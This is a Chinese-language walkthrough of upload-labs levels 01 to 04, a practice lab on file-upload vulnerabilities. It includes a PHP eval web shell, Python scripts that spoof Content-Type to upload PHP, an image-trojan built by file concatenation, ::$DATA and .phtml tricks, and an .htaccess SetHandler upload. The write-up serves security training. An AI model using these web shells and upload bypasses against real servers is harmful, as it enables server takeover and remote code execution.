upload-labs文件上傳01-04

upload-labs

01 前端js繞過

ctrl+u查看源碼

function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("請選擇要上傳的文件!");
            return false;
        }
        //定義允許上傳的文件類型
        var allow_ext = ".jpg|.png|.gif";
        //提取上傳文件的類型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判斷上傳文件類型是否允許上傳
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "該文件不允許上傳，請上傳" + allow_ext + "類型的文件,當前文件類型爲：" + ext_name;
            alert(errMsg);
            return false;
        }
    }

將var allow_ext = ".jpg|.png|.gif";改爲var allow_ext = ".jpg|.png|.gif|.php";,用chrome瀏覽器，F12打開dev tool,在console裏黏貼checkFile函數，執行checkFile即可上傳php。

<!-- test.php -->
<?php
@eval($_POST['cmd']);
?>

02 MIME繞過(1)

服務端MIME類型檢測也就是檢測Content-Type的內容

Content-Type: application/octet-stream
Content-Type: image/jpeg

抓取正常的圖片流量，與源碼對比

抓包
Content-Disposition: form-data; name="upload_file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Disposition: form-data; name="submit"
ctrl+u:源碼
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="上傳"/>

python3 requests.post的files參數如下

files = {
            "upload_file" : ("test33.jpg", open(lfile, "rb"), "image/png"),
            "submit": (None, lfile)
            }
#est33.jpg 遠程文件名，lfile本地文件名，filename="test.jpg"後面沒東西填None

繞過代碼：

#coding:utf-8
import requests

def upload_img(lfile,url):
    try:
        #test33.php 遠程文件名，lfile本地文件名，filename="test.php"後面沒東西填None
        files = {
            "upload_file" : ("test33.php", open(lfile, "rb"), "image/png"),
            "submit": (None, lfile)
            }

        req = requests.post(url, files=files)
        print(req.text)
    except Exception as e:
        print(str(e))
        pass

if __name__ == '__main__':
    lfile = 'test.php'
    url = 'http://192.168.22.130/upload-labs-master/Pass-02/index.php'
    upload_img(lfile,url)

02 MIME繞過(2)

生成圖片木馬

cmd運行convert.bat

rem convert.bat
copy test.jpg/b+test.php/a test2.jpg
pause
rem a => ascii

<!-- test.php -->
<?php
@eval($_GET['cmd']);
?>

激活test2.jpg包含的php code
需要用php包含，test2.php:

<?php
include 'test2.jpg'
?>

執行

http://$uri/test2.php?cmd=phpinfo()；

python 3:

#coding:utf-8
import requests

def convert2img(file_img, file_php, target):
    try:
        f1 = open(file_img, 'rb')
        f2 = open(file_php, 'rb')
        f3 = open(target, 'wb+')
        f3.write(f1.read())
        f3.write(f2.read())
        f1.close()
        f2.close()
        f3.close()
    except Exception as e:
        print('[-]: '+str(e))

def upload_img(lfile,url):
    try:
        #test2.jpg 遠程文件名，lfile本地文件名，filename="test.jpg"後面沒東西填None
        files = {
            "upload_file" : ("test2.jpg", open(lfile, "rb"), "image/png"),
            "submit": (None, lfile)
            }

        req = requests.post(url, files=files)
        if req.status_code == 200:
            print("[+]: upload success")
    except Exception as e:
        print("[-]: upload failed")
        print(str(e))
        pass

if __name__ == '__main__':
    file_img = 'test.jpg'
    file_php = 'test.php'
    target = 'test2.jpg'
    convert2img(file_img, file_php, target)
    lfile = target
    url = 'http://192.168.22.130/upload-labs-master/Pass-02/index.php'
    upload_img(lfile,url)

03 mime.types

$file_ext = str_ireplace('::$DATA', '', $file_ext);
//去除字符串::$DATA ,可以採用Windows文件流特性繞過
//文件名+"::$DATA"會把::$DATA之後的數據當成文件流處理,不會檢測後綴名.且保持"::$DATA"之前的文件名

Apache有解析漏洞，文件在/etc/mime.types
application/x-httpd-php          phtml pht php
上傳phtml文件

04 .htaccess

Apache配置：
/etc/apache2/apache2.conf
AllowOverride All

Apache加載mod_Rewrite模塊
cp /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/rewrite.load

rewrite.load內容:
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so

systemctl restart apache2

httpd配置：
/etc/httpd/conf/httpd.conf
AllowOverride All

/etc/httpd/conf.modules.d/00-base.conf
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so

systemctl restart httpd.service

#coding:utf-8
import requests
import time
URL = 'http://192.168.22.130/000/upload-labs-master'

def upload_img(lfile,url):
    try:
        files = {
            "upload_file" : ("pass-04.jpg", open(lfile, "rb"), "image/png"),
            "submit": (None, lfile)
            }
        req = requests.post(url, files=files)
        if req.status_code == 200:
            print("[+]: upload success")
    except Exception as e:
        print("[-]: upload failed")
        print(str(e))
        pass

def up_htaccess(lfile,url):
    try:
        files = {
            "upload_file" : (".htaccess", open(lfile, "rb"), "text/plain"),
            "submit": (None, lfile)
            }
        req = requests.post(url, files=files)
        if req.status_code == 200:
            print("[+]: upload success")
    except Exception as e:
        print("[-]: upload failed")
        print(str(e))
        pass

if __name__ == '__main__':
    lfile_1 = 'pass-04.htaccess'
    lfile_2 = 'pass-04.jpg'
    url = URL + '/Pass-04/index.php'

    up_htaccess(lfile_1,url)
    time.sleep(1)
    upload_img(lfile_2,url)
 
 
 pass-04.htaccess內容(將文件當成php):
 SetHandler application/x-httpd-php

upload-labs文件上傳01-04

upload-labs

ODbgScript學習

PhpStorm+xampp配置xdebug

解決PyInstaller vcruntime140.dll沒有被指定在Windows上運行

ctf之AWD(5)_服務器

ctf之AWD(3)_重寫菜刀

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結